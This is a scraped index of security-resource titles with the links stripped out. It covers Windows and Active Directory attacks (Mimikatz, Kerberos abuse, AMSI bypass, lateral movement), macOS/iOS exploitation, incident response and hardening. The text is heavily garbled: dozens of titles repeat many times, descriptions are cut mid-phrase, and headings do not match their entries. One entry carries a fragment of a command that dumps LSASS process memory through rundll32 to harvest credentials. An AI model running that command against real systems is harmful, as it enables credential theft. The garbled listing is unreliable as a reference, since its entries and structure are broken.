• BloodHound Database Creator
• Case Study: Password Analysis with BloodHound
• Introducing BloodHound 4.0: The Azure Update
• Kerberos basics & (ab)use of Certificates within Active Directory (i.e. AD CS and PKINIT) - [The Hacker Recipes](https://github.com/ShutdownRepo/The-Hacker-Recipes):
• LDAP Ping and Determining Your Machine’s Site
• GPO Abuse: “You can’t see me”
• Shooting Up: On-Prem to Cloud — Detecting “AADConnect” Creds Dump
• Using Kerberos for Authentication Relay Attacks
• Kerberos basics & (ab)use of Certificates within Active Directory (i.e. AD CS and PKINIT)
• Kerberos Resource-Based Constrained Delegation
• Kerberos cheatsheet
• Bypassing AD account lockout for a compromised account
• Azure AD and ADFS best practices
• Domain Goodness
• Non-Admin NTLM Relaying & ETERNALBLUE Exploitation
• Active Directory administrative tier model
• Hunting for reconnaissance activities using LDAP search filters
• Faking an AD account password change is possible , but detectable.
• Configure the log analytics wizard
• GetNPUsers & Kerberos Pre-Auth Explained
• EXTRACTING PASSWORD HASHES FROM THE NTDS.DIT FILE
• Active Directory Lab Setup Tool
• Enabling Active Directory DNS query logging
• Detecting CVE-2020-1472 (CISA ED 20-04) Using Splunk Attack Range
• Still Passing the Hash 15 Years Later
• Detecting Abuse of Authentication Mechanisms
• Detecting the Elusive: Active Directory Threat Hunting
• Exporting AD FS certificates revisited: Tactics, Techniques and Procedures
• Active Directory Certificate Services (ADCS - PKI) domain admin vulnerability
• Cobalt strike MANUALS_V2
• Active Directory (Attack & Defense )
• Your Azure AD Connect server ... it's a Tier 0 asset
• From Zero to Domain Admin
• Attacking Active Directory: 0 to 0.9
• Offensive WMI - Active Directory Enumeration - Part [2](https://0xinfection.github.io/posts/wmi-classes-methods-part-2/), [3](https://0xinfection.github.io/posts/wmi-registry-part-3/), [4](https://0xinfection.github.io/posts/wmi-recon-enum/) and [5](https://0xinfection.github.io/posts/wmi-ad-enum/).
• SID filter as security boundary between domains? (Part 7) - Trust account attack - from trusting to trusted
• Harvesting Active Directory credentials via HTTP Request Smuggling
• Protection of privileged users and groups by Azure AD Restricted Management Administrative Units
• Walk-through Mimikatz sekurlsa module
• Mimikatz: Mitigando ataques de roubo de credenciais
• PERFORMING PASS-THE-HASH ATTACKS WITH MIMIKATZ
• Protecting RDP Passwords from Mimikatz Using Remote Credential Guard
• Updating Mimikatz in Metasploit
• Capturing Credentials with mimikatz
• Dumping User Passwords from Windows Memory with Mimikatz
• CredentialDumping without Mimikatz - Process lsass).Id Temp\<NAME>.dmp full;Wait-Process -Id (Get-Process rundll32).id```
• Dumping Lsass Without Mimikatz
• PowerShell Gallery
• Example of Malicious DLL Injected in PowerShell
• POWERSHELL LOGGING: OBFUSCATION AND SOME NEW(ISH) BYPASSES PART 1
• DevSec Defense - How DevOps Practices Can Drive Detection Development For Defenders
• Geeking out with UEFI, again
• PowerShell Security: PowerShell Attack Tools, Mitigation, & Detection
• PowerShell Obfuscation
• Understanding and Bypassing AMSI
• Exploring PowerShell AMSI and Logging Evasion
• AMSI.fail
• INTRODUCTION TO SANDBOX EVASION AND AMSI BYPASSES
• comsvcs MiniDump examples
• Beginning PowerShell Empire - Packet Analysis
• Detailed properties in the Office 365 audit log
• Office 365 Mail Forwarding Rules (and other Mail Rules too)
• Application Guard for Office (public preview) for admins
• Exploiting MFA Inconsistencies on Microsoft Services
• Making Clouds Rain :: Remote Code Execution in Microsoft Office 365
• How to hunt for LDAP reconnaissance within M365 Defender?
• Stealing tokens, emails, files and more in Microsoft Teams through malicious tabs
• Reproducing The ProxyShell Pwn2Own Exploit
• ProxyLogon is Just the Tip of the Iceberg
• PROXYTOKEN: AN AUTHENTICATION BYPASS IN MICROSOFT EXCHANGE SERVER
• How Default Permissions on Microsoft Power Apps Exposed Millions
• Excel Recipe: Some VBA Code with a Touch of Excel4 Macro
• An XML-Obfuscated Office Document (CVE-2021-40444)
• Simple Analysis Of A CVE-2021-40444 .docx Document
• Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
• Release the Kraken: Fileless injection into Windows Error Reporting service
• Case Study: Password Analysis with BloodHound
• Introducing BloodHound 4.0: The Azure Update
• Updating Mimikatz in Metasploit
• Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
• Case Study: Password Analysis with BloodHound
• Introducing BloodHound 4.0: The Azure Update
• Updating Mimikatz in Metasploit
• Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
• Case Study: Password Analysis with BloodHound
• Introducing BloodHound 4.0: The Azure Update
• Updating Mimikatz in Metasploit
• Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
• Understanding WdBoot (Windows Defender ELAM)
• Five PE Analysis Tools Worth Looking At
• Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
• Case Study: Password Analysis with BloodHound
• Introducing BloodHound 4.0: The Azure Update
• Updating Mimikatz in Metasploit
• Six Facts about Address Space Layout Randomization on Windows
• Case Study: Password Analysis with BloodHound
• Introducing BloodHound 4.0: The Azure Update
• Updating Mimikatz in Metasploit
• ProcessHacker
• Windows-auditing-mindmap
• How to bypass Defender in a few easy steps
• Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
• Case Study: Password Analysis with BloodHound
• Introducing BloodHound 4.0: The Azure Update
• Certificate Services (AD-CS)
• Certificate templates
• Access controls
• Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
• Windows Debugger API — The End of Versioned Structures
• Event Log Explorer™ for Windows event log analysis
• Introducing BloodHound 4.0: The Azure Update
• Case Study: Password Analysis with BloodHound
• Updating Mimikatz in Metasploit
• Preventing Mimikatz Attacks – Blue Team – Medium
• There’s multiple threat actors using OneDrive in campaigns, straight up just linking OneDrive.
• All Your (d)Base Are Belong To Us, Part 2: Code Execution in Microsoft Office (CVE-2021–38646)
• NTCore
• Winerror
• Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
• Case Study: Password Analysis with BloodHound
• Introducing BloodHound 4.0: The Azure Update
• Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
• Case Study: Password Analysis with BloodHound
• Introducing BloodHound 4.0: The Azure Update
• Case Study: Password Analysis with BloodHound
• Introducing BloodHound 4.0: The Azure Update
• CA configuration
• Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
• Introducing BloodHound 4.0: The Azure Update
• Case Study: Password Analysis with BloodHound
• Updating Mimikatz in Metasploit
• Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
• Case Study: Password Analysis with BloodHound
• Introducing BloodHound 4.0: The Azure Update
• Updating Mimikatz in Metasploit
• Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
• Case Study: Password Analysis with BloodHound
• Introducing BloodHound 4.0: The Azure Update
• Case Study: Password Analysis with BloodHound
• Introducing BloodHound 4.0: The Azure Update
• Reset the krbtgt account password/keys
• Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
• Case Study: Password Analysis with BloodHound
• Introducing BloodHound 4.0: The Azure Update
• Updating Mimikatz in Metasploit
• Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
• Case Study: Password Analysis with BloodHound
• Introducing BloodHound 4.0: The Azure Update
• Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
• Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
• Introducing BloodHound 4.0: The Azure Update
• Case Study: Password Analysis with BloodHound
• Updating Mimikatz in Metasploit
• Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
• Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
• Case Study: Password Analysis with BloodHound
• Introducing BloodHound 4.0: The Azure Update
• Updating Mimikatz in Metasploit
• Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
• Case Study: Password Analysis with BloodHound
• New Variant of DLL Search Order Hijacking Bypasses Windows 10 and 11 Protections
• Introducing BloodHound 4.0: The Azure Update
• Updating Mimikatz in Metasploit
• Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
• Case Study: Password Analysis with BloodHound
• Introducing BloodHound 4.0: The Azure Update
• Updating Mimikatz in Metasploit
• Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
• Case Study: Password Analysis with BloodHound
• Introducing BloodHound 4.0: The Azure Update
• Updating Mimikatz in Metasploit
• Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
• Case Study: Password Analysis with BloodHound
• Introducing BloodHound 4.0: The Azure Update
• Updating Mimikatz in Metasploit
• Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
• Case Study: Password Analysis with BloodHound
• Introducing BloodHound 4.0: The Azure Update
• Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
• Case Study: Password Analysis with BloodHound
• Introducing BloodHound 4.0: The Azure Update
• Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
• Case Study: Password Analysis with BloodHound
• Introducing BloodHound 4.0: The Azure Update
• Updating Mimikatz in Metasploit
• Updating Mimikatz in Metasploit
• Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
• Case Study: Password Analysis with BloodHound
• Introducing BloodHound 4.0: The Azure Update
• Updating Mimikatz in Metasploit
• Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
• Case Study: Password Analysis with BloodHound
• Introducing BloodHound 4.0: The Azure Update
• Pass the Certificate
• UnPAC the hash
• Shadow Credentials
• Case Study: Password Analysis with BloodHound
• Introducing BloodHound 4.0: The Azure Update
• Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
• Updating Mimikatz in Metasploit
• Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
• Windows AllTools
• Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
• Updating Mimikatz in Metasploit
• Case Study: Password Analysis with BloodHound
• Introducing BloodHound 4.0: The Azure Update
• OffensiveCSharp
• Case Study: Password Analysis with BloodHound
• Introducing BloodHound 4.0: The Azure Update
• Updating Mimikatz in Metasploit
• PowerShell Scripts
• The worst of the two worlds: Excel meets Outlook
• Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
• Case Study: Password Analysis with BloodHound
• Introducing BloodHound 4.0: The Azure Update
• Updating Mimikatz in Metasploit
• Introducing BloodHound 4.0: The Azure Update
• Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
• Case Study: Password Analysis with BloodHound
• PowerShell Obfuscation
• Updating Mimikatz in Metasploit
• Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
• Case Study: Password Analysis with BloodHound
• Introducing BloodHound 4.0: The Azure Update
• PowerShell Obfuscation
• Updating Mimikatz in Metasploit
• Updating Mimikatz in Metasploit
• Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
• Case Study: Password Analysis with BloodHound
• Introducing BloodHound 4.0: The Azure Update
• Updating Mimikatz in Metasploit
• Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
• Case Study: Password Analysis with BloodHound
• Introducing BloodHound 4.0: The Azure Update
• Case Study: Password Analysis with BloodHound
• Updating Mimikatz in Metasploit
• Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
• Introducing BloodHound 4.0: The Azure Update
• Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
• Case Study: Password Analysis with BloodHound
• Introducing BloodHound 4.0: The Azure Update
• Updating Mimikatz in Metasploit
• Building Free Active Directory Lab in Azure
• Configuring Additional LSA Protection
• Awesome Advanced Windows Exploitation References
• windows kernel security development
• A process scanner detecting and dumping hollowed PE modules.
• dll_to_exe
• pe-sieve - memory patches).
• MSRC
• DCSYNCMonitor
• Total Meltdown?
• DetectionLab - detection-lab-61db34bed6ae)
• powerlessshell
• internal-monologue
• Robber
• LogRM
• InvisiblePersistence
• Dynamic Tracing in Windows 10 19H1
• LoL Malware Meets Python-Based Command and Control (C2) Server, Part I
• Detours
• r0ak - - A Command Line Utility To Read/Write/Execute Ring Zero on for Windows 10 Systems.
• SpeculationControl - 2017-5715 (Spectre variant 2) and CVE-2017-5754 (Meltdown).
• EKFiddle
• Windows Command-Line
• MSconsole
• DbgShell - end for the Windows debugger engine.
• Windows Incident Response: Updates
• Win 10 related research
• Windows Privilege Escalation (Unquoted Path Service)
• WinPwnage
• An introduction to privileged file operation abuse on Windows
• SweetPotato
• Windows Exploit Suggester - Next Generation (WES-NG)
• Windows Local Privilege Escalation Cookbook
• relayer
• Ps1jacker
• python-dotnet-binaryformat
• Firework
• hUACME
• SysmonTools
• sysmon-config - quality event tracing.
• Sysmon: how to set up, update and use?
• Inveigh - in-the-middle tool. [announcement](https://blog.netspi.com/inveigh-whats-new-in-version-1-4/)
• Bypassing AppLocker Custom Rules
• SpecuCheck - 2017-5754 (Meltdown) and hardware mitigations against CVE-2017-5715 (Spectre)
• RID-Hijacking
• WSL Reloaded
• randomrepo
• rdpy
• SharpWeb
• reconerator
• ManbagedInjection - knowledge
• InveighZero
• DanderSpritz Lab
• Lateral movement using URL Protocol
• HiddenPowerShell
• One Windows Kernel
• raw-socket-snifferr
• DCOMrade
• shed
• How to steal NTLMv2 hashes using file download vulnerability in web application
• NTLMRelay2Self - Fix LPE, NTLMRelay2Self over HTTP (Webdav).
• Simpleator - ator") is an innovative Windows-centric x64 user-mode application emulator that lever
• OrgKit - new company with proper defaults in Windows, Offic365, and Azure
• windowsblindread
• azucar
• volatility-wnf
• ALPC-BypassUAC
• ManagedPasswordFilter
• DeviceGuardBypasses
• rifiuti2
• Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
• .NET Manifesto
• symboliclink-testing-tools
• Run PowerShell without Powershell.exe
• Privileged Access Workstations
• Evil-WinRM
• SharpHide
• Microsoft Finally Releases Guidance and a Script to Change the KRBTGT Account
• Getting Malicious Office Documents to Fire with Protected View Enable
• COM-Code-Helper
• Scylla
• A Speed-Research on Windows Explorer's Auto-Completion
• Windows Event Forwarding Guidance
• Build a fast, free, and effective Threat Hunting/Incident Response Console with Windows Event Forwarding and PowerBI
• Microsoft Defender Advanced Threat Protection (ATP)
• BeaKer - Beaconing Kibana Executable Report: Aggregates Sysmon Network Events With Elasticsearch and Kibana
• python-ntlm - ntlm
• Logging Made Easy - install tutorial for small organisations to gain a basic level of centralised security logging for Windows clients and provide functionality to detect attacks.
• Secure DevOps Kit for Azure
• DisableAntiSpyware
• Have you ever wondered what happens behind the scenes when you type your password into the Windows logon screen and hit enter?
• DefendTheFlag
• DumpReparsePoints
• This is about adding a $ account and have it not show up in net users.
• LECmd
• PECmd
• Five PE Analysis Tools Worth Looking At
• pestudio
• PEview version
• exeinfo
• PE Parser
• AnalyzePE.py
• MitigationFlagsCliTool
• Windows 10 System Programming book samples
• DriverMon
• Windows-driver-samples - only driver samples.
• procfilter - integrated process denial framework for Windows
• Winerror
• Release the Kraken: Fileless injection into Windows Error Reporting service
• MinHook
• TokenPlayer
• The Poisoned Postman: Detecting Manipulation of Compliance Features in a Microsoft Exchange Online Environment
• ntlmscan
• Smbtouch-Scanner
• Block process creations originating from PSExec and WMI commands
• VDM
• HppDLL
• SharpMapExec
• Fibratus
• Ultimate WDAC Bypass List
• Live Patching Windows API Calls Using PowerShell
• Adventures in Dynamic Evasion
• Windows-Insight
• Fully working SMB protocol implementation in webassembly
• Parent Process vs. Creator Process
• ntvdmx64
• RegRipper
• Security rapid modernization plan
• Hyper-V internals researches - V.
• MSTSC Packet Dump Utility
• Running NetworkMiner in Windows Sandbox
• Windows Desktop
• A collection of tools to interact with Microsoft Security Response Center API
• GetTempPathW function
• Human-operated ransomware - operated ransomware is a large and growing attack trend that represents a threat to organizations in every industry.
• Sharing the first SimuLand dataset to expedite research and learn about adversary tradecraft
• Microsoft Security Best Practices
• EVERYONE GETS A ROOTKIT - based Devices Since Windows 8.
• Six Facts about Address Space Layout Randomization on Windows
• whids
• If you ever see RDP events, you should parse out the RDP bitmap cache. It maps out bitmap images of a user's RDP session.
• Here are a few tool resources for using WinRM w/o PowerShell
• winrs
• Scripting in Windows Remote Management
• CSharpWinRM
• WinRMDLL
• WSMan-WinRM - of-concept source code and scripts for executing remote commands over WinRM using the WSMan.Automation COM object.
• pywinrm
• LACheck
• awesome_windows_logical_bugs
• SMB-Session-Spoofing
• MSSQL Analysis Services - Coerced Authentication
• Reinschauer
• Lsass Shtinkering
• Windows XP / Windows Server 2003 VLK key generator
• Banshee
• Active Directory Control Paths
• Invoke-ADLabDeployer
• PowerShellClassLab
• ADImporter
• Active Directory Kill Chain Attack & Defense
• BloodHound - it/BloodHound.py) based ingestor for BloodHound
• Case Study: Password Analysis with BloodHound
• Introducing BloodHound 4.0: The Azure Update
• SharpHound3
• ATTACK MAPPING WITH BLOODHOUND
• aclpwn.py - py-exploit-acl-based-privilege-escalation-paths-in-active-directory/)
• BloodHound.py
• BloodHound-Tools
• Kerberos basics & (ab)use of Certificates within Active Directory (i.e. AD CS and PKINIT) - [The Hacker Recipes](https://github.com/ShutdownRepo/The-Hacker-Recipes):
• Certificate Services (AD-CS)
• Certificate templates
• CA configuration
• Access controls
• Web endpoints
• Kerberos basics & (ab)use of Certificates within Active Directory (i.e. AD CS and PKINIT)
• New-KrbtgtKeys.ps1
• NetNTLMtoSilverTicket - > Responder w/NetNTLM Downgrade -> NetNTLMv1 -> NTLM -> Kerberos Silver Ticket.
• windapsearch
• Active Directory administrative tier model
• Exchange-AD-Privesc
• Hunting for reconnaissance activities using LDAP search filters
• Faking an AD account password change is possible , but detectable.
• Configure the log analytics wizard
• WinPwn - Security
• BadBlood
• Vulnerable-AD
• EXTRACTING PASSWORD HASHES FROM THE NTDS.DIT FILE
• Active-Directory-Exploitation-Cheat-Sheet
• Active Directory Lab Setup Tool
• Rubeus
• ADTimeline
• Azure-Sentinel - native SIEM for intelligent security analytics for your entire enterprise.
• Exporting AD FS certificates revisited: Tactics, Techniques and Procedures
• GPO Abuse: “You can’t see me”
• SERVER (UN)TRUST ACCOUNT
• Active Directory Certificate Services (ADCS - PKI) domain admin vulnerability
• DSInternals
• Certipy
• Active Directory (Attack & Defense )
• Your Azure AD Connect server ... it's a Tier 0 asset
• AADInternals
• BloodyAD
• SID filter as security boundary between domains? (Part 7) - Trust account attack - from trusting to trusted
• KrbRelayUp - fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).
• Ping Castle Cloud
• A little tool to play with Windows security
• pypykatz
• PERFORMING PASS-THE-HASH ATTACKS WITH MIMIKATZ
• SharpKatz
• Updating Mimikatz in Metasploit
• Capturing Credentials with mimikatz
• Dumping User Passwords from Windows Memory with Mimikatz
• HandleKatz
• CredentialDumping without Mimikatz - Process lsass).Id Temp\<NAME>.dmp full;Wait-Process -Id (Get-Process rundll32).id```
• Empire - exploitation framework.
• Invisi-Shell
• Chimera - ish) PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.
• PrivescCheck
• Stracciatella - safe Powershell runspace from within C# (aka SharpPick) with AMSI, Constrained Language Mode and Script Block Logging disabled at startup
• Invoke-PSImage
• Invoke-TheHash
• DeepBlueCLI - a PowerShell Module for Threat Hunting via Windows Event Logs.
• CheeseTools - developed tools for Lateral Movement/Code Execution.
• Random
• CredPhish
• powercat
• PSByPassCLM
• Basic PowerShell for Pentesters
• Invoke-CradleCrafter - invoke-cradlecrafter-overview](https://www.danielbohannon.com/blog-1/2017/12/2/the-invoke-cradlecrafter-overview)
• LDAP Monitor
• INTRODUCTION TO SANDBOX EVASION AND AMSI BYPASSES
• PSBits
• Evading Detection: A Beginner's Guide to Obfuscation
• Office 365 Mail Forwarding Rules (and other Mail Rules too)
• o365spray
• AdminSubmissionsAPI scripts for URL and mail submission. - scan and get newest verdict on submitted entity. Admin Submissions API is available both to Exchange Online Protection customers as well as to Office 365 ATP customers.
• Commentator
• msoffcrypto-tool
• pyxlsb2
• Go365
• Microsoft-365-Defender-Hunting-Queries
• m365_groups_enum
• Excel Recipe: Some VBA Code with a Touch of Excel4 Macro
• An XML-Obfuscated Office Document (CVE-2021-40444)
• Simple Analysis Of A CVE-2021-40444 .docx Document
• cli-microsoft365 - microsoft365/) [export teams conversations](https://techgenix.com/export-microsoft-teams-conversations-with-cli-for-microsoft-365/)
• There’s multiple threat actors using OneDrive in campaigns, straight up just linking OneDrive.
• MSSpray
• Comparison of MOTW (Mark of the Web) propagation support of archiver software for Windows
• SnaffPoint
• Overview and Setup
• Blocking Process Creation
• Access Tokens and Access Checking
• Blocking DLL Loading

macOS/iOS

• Introducing
• Apple Lightning (cont.) - serial number reading
• Apple Open Source - open-source-mirror/Security): security mirror.
• Inside Code Signing
• Disabling MacOS SIP via a VirtualBox kext Vulnerability
• Remote Mac Exploitation Via Custom URL Schemes
• The Mac Malware of 2018
• Knowledge is Power! Using the macOS/iOS knowledgeC.db Database to Determine Precise User and Application Usage
• iOS12 Kernelcache Laundering
• inject_trusts-iOS-v12.1.2-16C104-iPhone11,x.c
• A sample of the iOS malware - sha256:0d2ee9ade24163613772fdda201af985d852ab506e3d3e7f07fb3fa8b0853560
• Pair Locking your iPhone with Configurator 2
• KTRW
• Privilege Escalation | macOS Malware & The Path to Root Part 2 - Scripts](https://github.com/bp88/JSS-Scripts): Random scripts for use in the Jamf Pro.
• Dylib Hijacking
• iOS Application Injection
• The Mac Malware of 2019 👾
• OSX.EvilQuest Uncovered
• Low-Level Process Hunting on macOS
• CVE-2020–9934: Bypassing TCC
• Attack Secure Boot of SEP
• Sinter - mode security enforcement for macOS. [A user-mode application authorization system for MacOS written in Swift](https://github.com/trailofbits/sinter/)
• We Hacked Apple for 3 Months: Here’s What We Found
• From zero to tfp0 - Part 1: Prologue
• From zero to tfp0 - Part 2: A Walkthrough of the voucher_swap exploit
• M1RACLES - 2021-30747 is a covert channel vulnerability in the Apple Silicon “M1” chip.
• MACOS INJECTION VIA THIRD-PARTY FRAMEWORKS
• IPv6 security
• All Your Macs Are Belong To Us
• macOS Security Compliance Project
• Introducing
• Zero-Day TCC bypass discovered in XCSSET malware
• Dissecting the Apple M1 GPU, part I - gpu-part-4.html)
• SSD Advisory – macOS Finder RCE
• Vulnerability Spotlight: A deep dive into macOS SMB server
• How to Use Kerberos on macOS
• Bypassing macOS TCC User Privacy Protections By Accident and Design
• Anecdotes About the macOS Sandbox File Limit
• How malware gets into the App Store and why Apple can't stop that
• Quick Analysis for the SSID Format String Bug
• De Rebus Antiquis - kexec-utils](https://github.com/xerub/ios-kexec-utils), [iRecovery](https://github.com/xerub/irecovery) -> [new repo](https://github.com/Chronic-Dev/libirecovery), iOS [GID Key](https://www.theiphonewiki.com/wiki/GID_Key)
• UTM
• Dissecting TriangleDB, a Triangulation spyware implant
• Introducing
• Introducing
• Introducing
• Introducing
• Introducing
• Introducing
• Who put that in my Full Disk Access list? ssh and Mojave’s privacy protection
• Introducing
• Remote Mac Exploitation Via Custom URL Schemes
• Introducing
• Introducing
• Introducing
• Introducing
• Introducing
• Introducing
• Introducing
• Introducing
• Introducing
• Introducing
• Introducing
• Introducing
• Introducing
• Introducing
• Introducing
• Introducing
• Introducing
• Introducing
• Introducing
• Introducing
• Introducing
• Introducing
• Introducing
• Introducing
• Introducing
• Introducing
• Introducing
• Introducing
• Assembly
• Having fun with macOS 1days
• x18-leak - 11.2.6 kernel pointer disclosure introduced by Apple's Meltdown mitigation.
• EmPyre - exploitation OS X/Linux agent written in Python 2.7
• SDQAnalyzer
• jelbrekTime
• mOSL
• DoNotDisturb
• sniffMK
• The Mac Malware of 2018
• KisMac2
• osx-security-awesome
• threadexec
• iOS12 Kernelcache Laundering
• kernelcache-laundering
• Armor - tool-designed-to-create-encrypted.html)
• opendrop
• A sample of the iOS malware - sha256:0d2ee9ade24163613772fdda201af985d852ab506e3d3e7f07fb3fa8b0853560
• ipwndfu - source jailbreaking tool for older iOS devices.
• The Mac Malware of 2019 👾
• OSX.EvilQuest Uncovered
• Low-Level Process Hunting on macOS
• CVE-2020–9934: Bypassing TCC
• Compromising the macOS Kernel through Safari by Chaining Six Vulnerabilities
• macOS-Fortress - Virus On-Demand and On-Access Scanning (PF, squid, privoxy, hphosts, dshield, emergingthreats, hostsfile, PAC file, clamav).
• From zero to tfp0 - Part 1: Prologue
• From zero to tfp0 - Part 2: A Walkthrough of the voucher_swap exploit
• We Hacked Apple for 3 Months: Here’s What We Found
• MACOS INJECTION VIA THIRD-PARTY FRAMEWORKS
• NetworkSniffer
• OpenHaystack
• All Your Macs Are Belong To Us
• macOS Security Compliance Project
• Introducing
• Mythic-Macro-Generator
• macOSTools
• TrueTree - like output on macOS with additional pid capturing capabilities.
• macos_shell_memory
• pwn-my
• Vulnerability Spotlight: A deep dive into macOS SMB server
• Bypassing macOS TCC User Privacy Protections By Accident and Design
• Quick Analysis for the SSID Format String Bug
• AirTag Scripts & Resources
• Pegasus ID - project.
• qemu-t8030
• kfd - pb/kfd/blob/main/writeups/smith.md) [landa](https://github.com/felix-pb/kfd/blob/main/writeups/landa.md).

Browsers Addons

• CLIP OS
• How to Get Started With VMware vSphere Security « vMiss.net
• UPX - performance executable packer for several executable formats. [repo](https://github.com/upx/upx)
• CLIP OS
• Awesome-Study-Resources-for-Kernel-Hacking
• bochspwn-reloaded - based instrumentation performing kernel memory taint tracking to detect disclosure of uninitialized memory to ring 3
• drltrace
• shellz
• CLIP OS
• How to Get Started With VMware vSphere Security « vMiss.net
• routeros
• Skadi
• taintgrind - tracking plugin for the Valgrind memory checking tool. [gcc + LD_PRELOAD + taintgrind + graphviz](https://gist.github.com/tkchia/8e4ce913ac28f07be64154cff8fef62e)
• MF Sniffer
• magic-trace - resolution traces of what a process is doing.

UEFI

• Force firmware code to be measured and attested by Secure Launch on Windows 10
• uefi-jitfuck
• Secure Boot in the Era of the T2
• PSPTool
• Project Mu
• Force firmware code to be measured and attested by Secure Launch on Windows 10

• FIRST
• Malware Analysis Resources
• Cert.BR - useful [links](https://www.cert.br/links/)
• 7º Fórum Brasileiro de CSIRTs
• list
• Shodan - connected devices. [Shodan 2000](https://2000.shodan.io/)
• CriminalIP - related information such as malicious IP addresses, domains, banners, etc. It can be widely integrated
• SPLOITUS
• Vulmon
• CIS SecureSuite® Membership
• CRYPTO101
• CPDoS
• The 4th in the 5th: Temporal Aspects of Cyber Operations
• Open CSIRT Foundation - [SIM v3 Model](http://opencsirt.org/wp-content/uploads/2019/12/SIM3-mkXVIIIc.pdf) and [SIM3 Self Assessment](https://sim3-check.opencsirt.org).
• Global Forum on Cyber Expertise (GFCE)
• Ten strategies of a world-class cybersecurity operations center
• Institute for Security and Technology - traditional approach has a bias towards action, as we build trust across domains, provide unprecedented access, and deliver and implement solutions.
• NIST'S CYBERSECURITY FRAMEWORK
• Illustrated X.509 Certificate
• DWF
• OpenEX - Platform/openex)
• NCSI
• THE EVOLUTION OF TRUST
• Downloads
• list
• Encoding vs. Encryption vs. Hashing vs. Obfuscation
• FIRST
• Cert.BR - useful [links](https://www.cert.br/links/)
• hacking-tutorials
• crypto
• cacao - open.org/committees/tc_home.php?wg_abbrev=cacao)
• cti-documentation
• SOCless - labs/socless)
• my-infosec-awesome
• How to Secure Anything
• Metasploitable3
• pluto-eris - pairing cycle of elliptic curves.
• cset
• comply
• Open Security Controls Assessment Language (OSCAL) - , JSON-, and YAML-based formats that provide a standardized representations of information pertaining to the publication, implementation, and assessment of security controls.
• OASIS Common Security Advisory Framework (CSAF) - tcs/csaf) [secvisogram](https://github.com/secvisogram/secvisogram) [editor](https://secvisogram.github.io/)
• notrandom
• Vulert - source dependencies—without accessing your code. It supports Js, PHP, Java, Python, and more.
• The 4th in the 5th: Temporal Aspects of Cyber Operations
• APT & CyberCriminal Campaign Collection
• Cert.BR - useful [links](https://www.cert.br/links/)
• 7º Fórum Brasileiro de CSIRTs
• 9º Fórum Brasileiro de CSIRTs
• CIS SecureSuite® Membership
• SMHasher - cryptographic hash functions. [another repo](https://github.com/aappleby/smhasher)
• Cybersecurity
• tink - language, cross-platform library that provides cryptographic APIs that are secure, easy to use correctly, and hard(er) to misuse.
• OASIS Common Security Advisory Framework (CSAF) - tcs/csaf) [secvisogram](https://github.com/secvisogram/secvisogram) [editor](https://secvisogram.github.io/)

Incident Response

• Applying DevOps Principles in Incident Response
• Pagerduty Incident Response
• Request Tracker
• CSIRT Schiltron: Training, Techniques, and Talent
• Practical Tabletop Drills for CSIRTS - Pre-session Material
• Critical Log Review Checklist for Security Incidents
• Exercise in a Box
• Incident response overview
• How to Write and Execute Great Incident Response Playbooks
• Incident Response: Windows Cheatsheet
• Incident Response: Windows Account Logon and logon Events
• Incident Response: Windows Account Management Event (Part 2)
• Incident Response- Linux Cheatsheet
• Building Better CSIRTs Using Behavioral Psychology - 21/briefings/schedule/index.html#building-better-csirts-using-behavioral-psychology-24331)
• The features all Incident Response Plans need to have
• security-training
• incident-response-docs
• global-irt
• atc-react
• Beagle
• DFIRTrack
• Aurora Incident Response
• timesketch
• FastIR Collector Linux
• Maltrail
• Request Tracker for Incident Response
• Applying DevOps Principles in Incident Response
• FIR
• Applying DevOps Principles in Incident Response
• Request Tracker for Incident Response
• Request Tracker
• Exercise in a Box
• Incident response overview
• The features all Incident Response Plans need to have

Hashing

• MD5 Decryption
• SHA-1 is a Shambles - Prefix Collision on SHA-1 and Application to the PGP Web of Trust
• Sha256 Algorithm Explained

Hashing

• here
• MikroTik
• Exploit Prediction Scoring System (EPSS) - driven effort for predicting when software vulnerabilities will be exploited. Our goal is to assist network defenders to better prioritize vulnerability remediation efforts.
• cve_manager
• dorkbot - line tool to scan Google search results for vulnerabilities.
• NotQuite0DayFriday
• CVE PoC
• here
• TROMMEL

Ghidra

• They Did - 2017-11882)
• They Did - 2017-11882)

Ghidra

• BlueWars
• Get SSH login notification on Telegram
• Implementing Least-Privilege Administrative Models
• Keyringer
• Keystone Project - enclave/)
• nftables
• Common approaches to securing Linux servers and what runs on them.
